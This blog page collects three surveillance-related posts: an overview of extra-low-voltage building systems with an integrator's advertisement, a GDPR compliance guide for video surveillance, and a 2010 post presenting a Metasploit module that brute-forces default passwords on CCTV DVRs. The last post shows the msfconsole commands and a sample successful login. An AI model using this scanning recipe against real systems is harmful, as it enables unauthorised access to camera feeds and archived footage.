Showing posts with label video surveillance system. Show all posts
Showing posts with label video surveillance system. Show all posts

Monday, September 1, 2025

ELV Systems

What are Extra-Low Voltage Systems (ELV)? 

Extra-Low Voltage means the voltage of electricity supply is in a range that is low enough that it does not carry any high risk of any high voltage electrical shock(s).

The range of voltage that can be classified as Extra-Low Voltage is alternating current not exceeding 50 V AC and direct current not exceeding 120 V DC (ripple free). This is based on the standards as per EN 61558 or BS 7671.

The term extra-low voltage ("ELV") means an operating voltage not exceeding 50 Volt alternating current (a.c.) or 120 Volt ripple free direct current (d.c.) as defined in Australian / New Zealand Standard AS/NZS 3000.

Therefore, Extra-Low Voltage Systems are any electrical systems that can operate on a low voltage with the voltage criteria as per above.

Key Characteristics

·        Low Voltage:The most defining feature is their safe, low-voltage operation, which reduces the risk of electric shock. 

·        Non-Core Systems:ELV systems are separate from the building's main, high-voltage electrical power system. 

·        Integrated Technologies:They are the "smart" components of a building, connecting devices and managing data. 

In this article, we are going to share more about different components of ELV systems.

Components of ELV Systems

Video Surveillance System:

Video-surveillance systems, also more commonly known as Closed Circuit Television, in short "CCTV", is made up of a network of cameras and recording systems that are connected to each other. This system would be classified as a ‘closed’ system as the system operates independently, unless it’s part of an ELV integrated system. A CCTV system is an effective way to monitor and secure any sensitive area(s).

Currently, cameras can be connected either wired or wireless to a CCTV system. CCTVs are an effective deterrence to any threats or area(s) that require constant offsite monitoring.

The key points in installing CCTV cameras is the positioning of the camera, to ensure that the camera can monitor the required area in its scope of view as well as the clarity of the video footage to ensure usability of the footage if necessary.

Access Control System – ACS:

Access control systems are a key feature of any security system hub that can secure, monitor and manage the access of staff in any type of building. With this system, staff can either be given access cards or using fingerprints(biometric), they are able to be granted access to various areas of the premises.

Nowadays, these systems ‘speak’ to each other wirelessly and usually connected to the local area network to reduce hard wiring cost and flexibility of the positioning of the system itself. At times, the access control system might be a part of a bigger integrated ELV system which allows central control of multiple different systems.

Public Address Voice Alarm System – PAVA:

A public address system is a system that allows an amplification of your voice through microphones and loudspeakers. Its purpose is to enhance the volume of human voice or any other sound for that matter.

The general alarm system allows remote control of alarms and flashing lights(beacons).

Combined, this system would serve a general use of relaying information or be used in the case of any emergency evacuations.

Fire Detection & Alarm System - FDAS:

Fire Alarm Control Panel is the brain of the system. Receives input from detectors, Manual call points & sends output to sounders/bells.

ELV fire alarm systems can provide early warning of fires in public and state facilities, allowing for prompt evacuation and reducing the risk of injury or death. These systems can also be integrated into building management systems to provide automatic fire suppression, such as sprinklers or fire extinguishers.

LAN and IP-BX System:

LAN stands for local-area network and is basically an interconnected computer network that usually covers a small area. This network of computer/devices can be connected to each other via physical wires called LAN cables or wirelessly (radio waves).

A telephone system is a group of interconnected telephones connected either via telephone lines or via LAN cables which then communicate using ‘Voice over Internet Protocol’ or in short VoIP.

Intrusion Alarm System - IAS

An intrusion alarm system — also known as a burglar alarm system — is an important security measure that can protect your business from unwanted intruders, theft, vandalism, and property damage.

Intrusion alarm systems provide several key benefits for businesses, such as increased safety for building occupants, faster response times to breaches, and lower insurance premiums. By investing in an intrusion alarm system, you are taking a proactive approach toward the safety and security of your property.

Nurse call system - NCS

A nurse call system is a healthcare technology solution in hospitals and nursing homes that allows patients to request assistance from staff by pressing a call button or using a pendant. These systems feature call buttons, receiving units at the nurse's station, and often wireless devices like pagers or watches to notify nurses in real-time. The primary goal is to ensure timely patient care, improve safety by reducing response times, and enhance staff efficiency through features like real-time alerts and reporting.

Trunk Radio System – TRS

A trunk radio system is a system whereby all available radio channels are placed in one single pool. When for example person A requires to transmit, a channel is automatically picked from the pool and used for person A’s transmission. Once the transmission is completed, the channel that person A was using will be placed back into the pool for others to use.

This system is highly beneficial as radio channels are limited by nature as for example, if all radio channels are taken up, we can’t physically or manually ‘create’ new channels. By using a trunk radio system, it’s more efficient in a sense there is a higher chance a user will get access to an available channel when required.

Home Automation System -  HAS:

Home automation is nothing but the mechanical management and administration of intelligent electronic appliances in a house. Sequencing pre-programmed smart devices to meet the unique needs of the residents is what a home automation system does.

In a home automation solution, devices can trigger each other without any human intervention. Furthermore, it allows users to schedule automated processes like switching the lights, controlling the temperature, calibrating the entertainment system, and more. What is home automation? It is an integrated system that makes life more convenient and helps in saving a variety of costs.

Fence Intrusion Detection System – FIDS

A fence intrusion detection system or FIDS for short is a security system whereby the key purpose of this system is to be able to detect any breaches that occur on any perimeter fences.

There are multiple sensors installed on different parts of the fence so whenever an intrusion is detected in a certain fenced area, if there is a CCTV nearby, the security personnel would be able to angle the CCTV to view the intrusion if possible. If necessary, a physical check on the fence is needed as well to ensure the security and integrity of the perimeter.

Building Management System - BMS:

Building Management Systems (BMS) that integrate and control various building functions. There are multiple sensors installed on different parts of the utility system. BMS Engineer control all utility system from single room. Building Management System also known as IBMS and BAS in Americas and the European countries.

IO Points are further categorized into analogue & digital, with suitable field devices. & sophisticated third party devices fixed in a building ranging from grounding an elevator to monitoring the water level of a sump to monitoring & controlling the properties of HVAC (Heating, Ventilation & Air Conditioning) equipment that is the Temperature, RH, Pressure.

Water Leak Detection (WLD) system:

Early Water Detection is essential in a lot of businesses, for example, data centers, industrial sites, offices, hotels, residential buildings, and more. With the right detection of water and early alert, costly water damage can be avoided. HW group offers several products that provide ideal solutions for Water Leak Detection (WLD) that are developed to protect your facility against any water damage that might threaten you.

Water Leak Detection uses a sensing cable that detects water along the entire cable length and a WLD device (WLD2 / NB-WLD / ...) that can communicate an alarm in case of water occurrence (a few drops anywhere on the cable is enough).

Master Clock System – MCS:

A master clock system is an interconnected system of clocks whereby slave clocks would take reference of time from a reference clock, also known as a master clock. These slave clocks would synchronize their time with the master clock. In this way, the time across both the master and slave clocks would be the same.

The use of master clock systems can be used in a variety of industries such as for the IT sector and military or anywhere that requires an extremely high degree of time accuracy.

Rodent Repellent System:

Rodent repellent is a device unit that emits ultrasonic sound waves to create an acoustically hostile environment that repels rodents. This helps to keep your Data Center free form rodents. Frequency of sound will induce rodents to move away from Data Center premises. As per research by University of Nebraska, Rodent Repellent is a proven device. Rodents under test could either leave the buildings or move to alternate non-ultrasonically treated areas.

As Data Center is the important business premises, we need to protect it from many risks.

Exit Stopper Door Alarms:

The highly effective Exit Stopper can serve as an inexpensive security device and help stop theft by alerting you to any unauthorized exits or entries through emergency exit doors. Standalone fire exit stopper alarm with one relay for integration with fire alarm system.

Professional Display & Signage

Professional display screens are high-quality, commercial-grade screens specifically designed for continuous use in business settings. Unlike consumer-grade TVs, they’re engineered to operate reliably for extended hours, often supporting 24/7 use without compromising on display quality or durability. Professional displays come with advanced features like remote content management, high brightness, and enhanced connectivity options, making them ideal for business environments.

ELV digital signage systems can provide real-time information, such as maps, directions, and event schedules, for tourists. This can improve convenience and enhance the overall experience by providing accurate and up-to-date information.

GRMS System:

Operates light management (on, off, or dimmer), automatic curtain openings (including blinds and rolling shutters), HVAC, TVs, and “do not disturb” or “make up room,” alerts based on the presence or absence of the guest in the room.

Mobile Phone and Wireless Distribution: 

Seamless connectivity, accessibility, and communication throughout a building.

Vehicle Tracking System

The GPS based Vehicle Tracking System comprises of an in-vehicle tracking system that consists of a GPS receiver unit, CDMA/GSM Modem, on-device Data Storage unit, other peripherals, and a web-based application. Through this system, the users will have the facility to monitor the movement and gather entire information of any vehicle.

IoT:

The IoT provides the connectivity that enables real-time monitoring and control of building systems, both on-site and remotely. With IoT-enabled BMS, building operators can monitor and control systems from anywhere, anytime, through a single user interface. This allows for greater efficiency, cost savings, and improved building performance.

In smart infrastructure, ELV systems, BMS, and IoT play a similar role in optimizing and monitoring the performance of critical infrastructure systems, such as energy grids, water supply networks, and transportation systems. These systems can be monitored and controlled in real-time to improve efficiency, reduce costs, and ensure reliability.

Role of IOT in improving ELV systems

The Internet of Things (IoT) can significantly improve ELV (Extra-Low Voltage) systems. IoT technology can connect and monitor ELV systems, providing real-time information, control, and automation capabilities.

Here are some ways in which IoT can improve ELV systems:

1.   Monitoring and Control: IoT devices, such as sensors and actuators, can control ELV systems, such as lighting, HVAC, and security systems. This can provide real-time information and allow for remote control of these systems, improving efficiency, comfort, and security.

2.   Predictive Maintenance: IoT technology can collect data from ELV systems and analyze it to predict when maintenance is needed. This can improve system reliability and reduce downtime, increasing efficiency and reducing costs.

3.   Energy Management: IoT technology can monitor and control energy consumption in ELV systems, reducing waste and improving energy efficiency. This can contribute to sustainability and reduce costs.

4.   Integration: IoT technology can integrate ELV systems with other building management systems, such as BMS (Building Management Systems), providing a more comprehensive and integrated solution.

5.   Real-time Analytics: IoT technology can collect and analyze real-time data from ELV systems, providing valuable insights into system performance and usage patterns. This can help to optimize system operation and improve decision-making.

Role of AI in ELV systems

Artificial Intelligence (AI) is playing an increasing role in ELV systems, including lighting control, building automation, audio and video systems, security systems, and more. AI can be used to improve the performance, efficiency, and intelligence of ELV systems in several ways:

1.   Predictive Maintenance: AI can analyze data from ELV systems to predict when maintenance or repairs will be required. This can reduce downtime and improve the overall reliability of the systems.

2.   Energy Efficiency: AI can optimize energy consumption in ELV systems, such as lighting control systems. For example, AI algorithms can analyze occupancy patterns and adjust lighting levels accordingly to reduce energy consumption.

3.   Real-Time Monitoring: AI can monitor ELV systems in real-time, providing early warning of potential issues and allowing for proactive maintenance and repairs.

4.   Automated Decision-Making: AI can automate decision-making processes in ELV systems, such as lighting or HVAC control. For example, AI algorithms can automatically analyze weather data and occupancy patterns to adjust heating and cooling levels.

5.   Improved User Experience: AI can improve the user experience of ELV systems, such as voice-controlled lighting control systems or personalized audio and video systems.

Role of cyber security for ELV systems

Cybersecurity is critical for ELV systems due to the sensitive nature of the systems and the potential consequences of a security breach. ELV systems are integrated into building management systems and often control essential functions, such as lighting, heating, ventilation, air conditioning, and security systems. Therefore, a breach of an ELV system can result in unauthorized access, loss of sensitive information, or disruption of critical building functions.

Here are some ways in which cyber security is essential for ELV systems:

1.   Protecting Sensitive Information: ELV systems often contain sensitive information, such as building plans, access codes, and security camera footage. Cybersecurity measures are necessary to protect this information from unauthorized access or theft.

2.   Preventing Unauthorized Access: ELV systems can be vulnerable to hacking or unauthorized access, allowing attackers to control or disrupt building functions. Cybersecurity measures, such as firewalls, access control systems, and encryption, are necessary to prevent unauthorized access.

3.   Maintaining Building Functionality: A breach of an ELV system can result in the disruption of critical building functions, such as heating, cooling, lighting, and security systems. Cybersecurity measures are necessary to maintain the functionality of these systems and protect against disruptions.

4.   Compliance with Regulations: Many countries have regulations and standards for cybersecurity in buildings, such as the European Union's General Data Protection Regulation (GDPR) and the United States Federal Information Processing Standard (FIPS). ELV systems must comply with these regulations to protect sensitive information and the security of building functions.

Conclusion

Now that you understand more about ELV systems and their various components, SSA INTEGRATE provides ELV system integration services for the telecommunications, security, surveillance and oil & gas industries.

We have a team of highly experienced engineers and technicians who would be able to assist you in any challenging system integration issues.

Our service is that we can design, supply and commissioned full ELV integrated systems, complete with detailed testing and following the actual site condition to ensure full functionality before handing over the project. Also we provide Information Security Management System audit as per ISO/IEC 27001: 2022.

Due to our experience in installing explosion proof systems, we are well versed in working and installing ELV systems in hazardous environments.


Posted by at 2 comments:
Labels: , , , , , , , , ,

Saturday, November 3, 2018

Video Security Dual Responsibility GDPR

Video Security Organizations’ Dual Responsibility Under GDPR

GDPR - the EU General Data Protection Regulation - is now in effect (on May 25th, 2018). The regulations are designed to protect the data privacy of European Union (EU) residents, but because the rules affect  any company handling EU data, the true influence of the GDPR is international in scope.

GDPR affects security technologies like video surveillance systems. Here’s what you need to know to improve your GDPR compliance.
GDPR is a regulation set forth to protect personal data and ensure the privacy of individuals within the European Union (EU), which is deemed to be a fundamental human right. The primary driver behind the regulation is to give individuals greater control over their personal data and how it is used. Despite its roots in the EU, GDPR also addresses the collection or storage of personal data from any EU citizen, as well as the export of data outside the region. Therefore, given the scope of GDPR, compliance is a global concern.

Because cybersecurity was a main driver behind GDPR, one of its mandates is that in the event that a data breach occurs, companies that collect personal data are mandated to report it in to the supervisory authority within 72 hours. Failure to comply with this regulation could result in penalties equaling 4 percent of a company’s global annual revenues or 20 million euros, whichever is greater.

Given the importance of individuals’ privacy and the potential penalties for non-compliance, these are important discussions; however, this focus is not enough for those of us in the security industry, who have a dual responsibility under GDPR. Why is that?

In practical terms of protecting individual privacy, GDPR places much of the responsibility and obligation on businesses and other organizations that deal with personal data. One of the key features of the new regulation is that those who are being monitored need to be fully informed about what data is being held on them and how it is being used.

Under GDPR, this “personal data” is defined very broadly as “any information relating to an identified or identifiable natural person,” referred to as the “data subject.” Naturally, the first types of personal data that come to mind are the classic examples such as name, physical address, phone number and email address, all of which meet the criteria. But these are only starting points, as the range of personal data types is expansive, encompassing more than simply text-based data.

As security professionals, we must recognize the reality that video in which a person can be identified is also considered personal data and is therefore subject to GDPR guidelines and requirements. Therefore, as organizations, we need to determine how best to become compliant with how we handle customer and employee data, including surveillance video. This dual responsibility must come into play when we consider how we design and operate security systems and collect video data through surveillance, including how we store and manage that video data after collection.

To do so, it is important to explore how many of the steps organizations must take to become GDPR compliant are also necessary to ensure that video surveillance data is compliant as well. These steps surveillance operators must take – and how they can be applied to collected video – are outlined below.

Administration
In general, the first step in ensuring GDPR compliance is to choose an administrator and record data processing activities. As an organization seeking to become GDPR compliant, it is essential to have a person on staff – known as a data processing officer – who will ultimately be responsible for data integrity. Each company providing video surveillance must choose an administrator.

In a security environment, choosing this administrator allows for an open way to publicly identify the person who is responsible for data collected from the surveillance systems and provide that detail to anyone who is monitored by video upon their request. In doing so, it is key to also make the name of this data processing officer available to every person who requests data as prescribed under GDPR.

Every organization should also have a procedure in place for when an individual chooses to exercise their right of access to personal data or request its deletion, which allows them to stay within the monthlong window within which GDPR requires them to comply with these requests. When making such a request, it is reasonable to expect an individual to provide adequate information in order to locate this data – for example, an approximate timeframe, and the location where the footage was captured.

Documentation

GDPR also recommends that record of processing activities (ROPA) documentation be maintained and the following information be made available upon request:
  • Category of individuals that processed personal data relates to
  • Purpose for which collected data is used
  • Whether personal data will be transferred (to whom and for what reason)
  • How long personal data will be stored
  • Description of technical and organizational measures to ensure privacy

According to GDPR, administrators should take all appropriate measures to provide this information concerning the processing of their data by surveillance systems to monitored individuals in a brief, transparent, comprehensible and easily accessible manner.


ROPA documentation must also include a risk assessment for individuals’ rights and freedoms and planned measures to address these risks, which include safeguards and mechanisms to ensure the protection of personal data and compliance with GDPR. This should take into account the rights and legitimate interests of individuals and other affected persons.

In a surveillance environment, these items are equally important. Focusing for a moment on purpose and extent of surveillance, it must be clear why and how much video is being collected, and for what reason. One thing to discuss with potential solution providers is the concept of privacy by design and “GDPR-ready” product features. In evaluating solutions, organizations should look for those that will help them more easily become GDPR compliant. An example would be technology supporting defined view of a specific perimeter. By leveraging solutions to define the perimeter, organizations adhere to GDPR in that they can more easily specify the extent of video surveillance.

Data Processing Inventory Assessment (DPIA)
Once an administrator has been chosen and ROPA documentation is complete, a DPIA is required for cases of “extensive systematic monitoring of publicly accessible premises.”


This requires specifying in writing why and for what purposes the camera system is recording. For example, a city needs to manage electrical and water utility stations and must ensure the utilities provide residents with dependable service. Therefore, the perimeter of these utility stations must be protected against crime and theft. Under GDPR, the city can specify that the surveillance is provided for this purpose. Another example would be to ensure the safety of citizens during public events, as surveillance video may be used by the police to provide real-time situational awareness for officers in the field. In this case, it can be specified, in accordance with GDPR guidelines, that video is being collected to support public safety.


This information directly correlates to ROPA documentation, so again we can see the connection between becoming compliant as an organization overall, as well as ensuring compliance for GDPR with information and data collected in a surveillance environment.

Data Security
Cybersecurity has been a major topic within the security industry for some years now. The importance of a surveillance system being cyber secure extends to compliance with GDPR, with tight control of video data being another key recommendation. It is vitally important when specifying a system that these critical measures are taken into account. The less data that is readily accessible to those outside the scope of an organization’s video data management procedures, the less risk there is of becoming non-compliant. The same philosophy applies to data breaches; administrators must report any leaks within 72 hours of notification.


To ensure GDPR compliance, companies should employ strong measures to prevent unauthorized access to the personal data they store, including video. The specific tools and tactics used by each company will be unique to the challenges they face. In all situations, however, companies must employ robust security controls, stay up to date with cybersecurity best practices and ensure they are working with trusted partners that provide secure hardware and software, as well as thorough aftercare. Therefore, organizations must work with security professionals and partners to better understand potential cybersecurity risks and talk about ways they can harden their systems to ensure GDPR compliance.

From a compliance perspective, the processes that must be put in place to ensure the “right to be forgotten” in an organization are very similar to those necessary to ensure a surveillance system is also in compliance. This requires taking a systematic approach to how video data is stored, transferred and deleted. These methodologies will ensure that if an individual requests his or her video footage be deleted, business systems and organizational structure will be in place to adhere to this request in an efficient manner. The concept of “right to be forgotten” is a significant part of the GDPR guidelines, and as we are just months into this new guideline, the impact on organizations and system operators after requests are submitted still remains to be seen.

Data audit
The first step toward cybersecurity risk management knows what data your company is collecting and how it is stored. A comprehensive data audit is fundamental because you’ll need to discover what information your company handles that could create liability under the GDPR. The GDPR is very inclusive in its scope, so a data audit should look at all platforms, device types and departments.

Risk assessment

Once you've done a data audit to establish a clear picture of how your company’s data management works, you’ll be in a position to make a risk assessment:
  • What cyber-threats could your company face?
  • Where are the security weak-points in your technology infrastructure?
  • Do you have effective cybersecurity measures in place?

End-to-End Compliance
It is important to consider the full scope of video surveillance. As a surveillance operator collecting video about living individuals, an organization will fall under the category of data controller and be held responsible for data management in accordance with GDPR. Anyone having access to video data, including subcontractors and hosted service providers, must meet requirements as well. These companies or individuals who have access to recorded video on behalf of an organization, such as hosting providers, fall under the category of data processors. In terms of company compliance, when reviewing contracts to ensure all companies comply in the same way as an organization has planned. In terms of surveillance, be sure to check that any persons or organizations who have access to video are also compliant and that contractual relationships reflect these obligations.

Ultimately, it is the surveillance system user (i.e., data controller) who is responsible for GDPR compliance and safeguarding the rights of individuals whose personal data the user collects and processes. While the data controller has ultimate responsibility to follow GDPR, data privacy is a team effort. Remember: We are all in this together.

Therefore, for users of surveillance equipment, solutions and services, it is important to partner with suppliers that are committed to respecting and safeguarding individuals’ privacy and protecting personal data. Users should also be able to rely on suppliers and vendors for the support and technical assistance necessary to facilitate GDPR compliance.

Due to its intent, the onset of GDPR is a positive one. It will allow data processors and controllers to use data in appropriate ways and have clear guidelines/procedures in place for data collection, management and surveillance. Many companies follow guidelines such as the UN Global Compact when it comes to sustainability and environmental responsibility. The UN Global Compact provides 10 clear principles to help guide companies in their sustainability efforts. GDPR provides similar clear direction to companies looking to protect individual privacy, a fundamental human right.

Information on individuals is a valuable asset and needs to be properly protected. Apart from making good business sense, the reputation and success of your organization can be under threat if personal information isn’t managed appropriately. Organizations can demonstrate effective management of personal information with BS 10012 from BSI.

It helps you:
  • Identify risks to personal information and put controls in place to manage or reduce them
  • Demonstrate compliance with data protection legislation and gain preferred supplier status
  • Gain stakeholder and customer trust that their personal data is protected 
  • Gain a tender advantage and win new business
  • Safeguard your organizations reputation and avoid adverse publicity
  • Protect you and your organization against civil and criminal liability
  • Benchmark your own personal information management practices with recognized best practice.

Basic Principles of the GDPR

Clearly Justified Purpose

All organizations must have a valid lawful basis for collecting and processing personal data
·         
Privacy by Design

The GDPR mandates that privacy must be a priority throughout system design and commissioning. The approach taken with respect to data privacy must be proactive, not reactive. Risks should be anticipated and the objective must be preventing events before they occur.
  
Right to Access

Under Article 15, the GDPR gives individuals control over their personal data including the right to see that data.

Right to be Forgotten

Under Article 17, the GDPR gives individuals control over their personal data including the right to have their personal data erased if it is no longer necessary for the intended purpose of the system.

Security

The GDPR requires organizations have comprehensive policies and procedures ensuring personal data remains within control of the organization at all times. Additionally, personal data breaches must be reported within 72 hours to the competent supervisory authority appointed by their country’s government.

Reference:
  1. https://www.mailguard.com.au/blog/gdpr-security-responsibility
  2. https://www.bsigroup.com/en-IN/
  3. https://edps.europa.eu/sites/edp/files/publication/10-03-17_video-surveillance_guidelines_en.pdf
  4. https://gdpr-info.eu/art-13-gdpr/



Posted by at 12 comments:
Labels: , , , , , , ,

Friday, September 17, 2010

Hacking CCTV Security Video Surveillance Systems with Metasploit

A new module for the Metasploit Framework, CCTV DVR Login Scanning Utility*, discovers and tests the security of standalone CCTV (Closed Circuit Television) video surveillance systems. Such systems are frequently deployed in retail stores, living communities, personal residences, and business environments as part of their physical security program. However, many of these systems are vulnerable to exploitation that can allow attackers remote access. Such remote access, enabled by default, can allow not only the ability to view real-time video, but control of the cameras (if supported), and provide access to archived footage.

Most owners of CCTV video surveillance systems may not even be fully aware of the device's remote access capabilities as monitoring may be conducted exclusively via the local video console. This further increases the likelihood of attackers gaining/persisting remote access, with no indication to the owner that their video surveillance system and archived footage may be accessed remotely.

Here at Gotham Digital Science, we often encounter video surveillance systems during penetration testing engagements – some of which may be exposed to the Internet, either intentionally or by accident. With any video surveillance system it is often interesting (and sometimes very important) to find out exactly what cameras are monitoring/recording within the environment. Furthermore, access to such systems can often be utilized to support physical security testing initiatives.

This module targets standalone CCTV video surveillance systems by MicroDigital, HIKVISION, CTRing, and a substantial number of other rebranded devices.

msf > use auxiliary/scanner/misc/cctv_dvr_loginmsf auxiliary(cctv_dvr_login) > set RHOSTS 10.10.1.14RHOSTS => 10.10.1.14msf auxiliary(cctv_dvr_login) > exploit

[*] 10.10.1.14:5920 CCTV_DVR - [001/133] - Trying username:'admin' with password:''
[-] 10.10.1.14:5920 CCTV_DVR - [001/133] - Failed login as: 'admin'
[*] 10.10.1.14:5920 CCTV_DVR - [002/133] - Trying username:'user' with password:''
[-] 10.10.1.14:5920 CCTV_DVR - [002/133] - Invalid user: 'user'
[*] 10.10.1.14:5920 CCTV_DVR - [003/133] - Trying username:'admin' with password:'admin'
[-] 10.10.1.14:5920 CCTV_DVR - [003/133] - Failed login as: 'admin'
[*] 10.10.1.14:5920 CCTV_DVR - [004/133] - Trying username:'admin' with       password:'1111'
[+] 10.10.1.14:5920 Successful login: 'admin' : '1111'
[*] Confirmed IE ActiveX HTTP interface (CtrWeb.cab v1,1,3,1): http://10.10.1.14:80
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
*CCTV DVR Login Scanning Utility:
This module tests for standalone CCTV DVR video surveillance deployments specifically by MicroDigital, HIKVISION, CTRing, and numerous other rebranded devices that are utilizing default vendor passwords. Additionally, this module has the ability to brute force user accounts. Such CCTV DVR video surveillance deployments support remote viewing through Central Management Software (CMS) via the CMS Web Client, an IE ActiveX control hosted over HTTP, or through Win32 or mobile CMS client software. By default, remote authentication is handled over port 5920/TCP with video streaming over 5921/TCP. After successful authentication over 5920/TCP this module will then attempt to determine if the IE ActiveX control is listening on the default HTTP port (80/TCP).
Module Name : auxiliary/scanner/misc/cctv_dvr_login
Authors: Mr. Justin Cacak
Visit: http://www.rapid7.com/db/modules/auxiliary/scanner/misc/cctv_dvr_login

Posted by at 17 comments:
Labels: , , , , , , , ,
Subscribe to: Posts (Atom)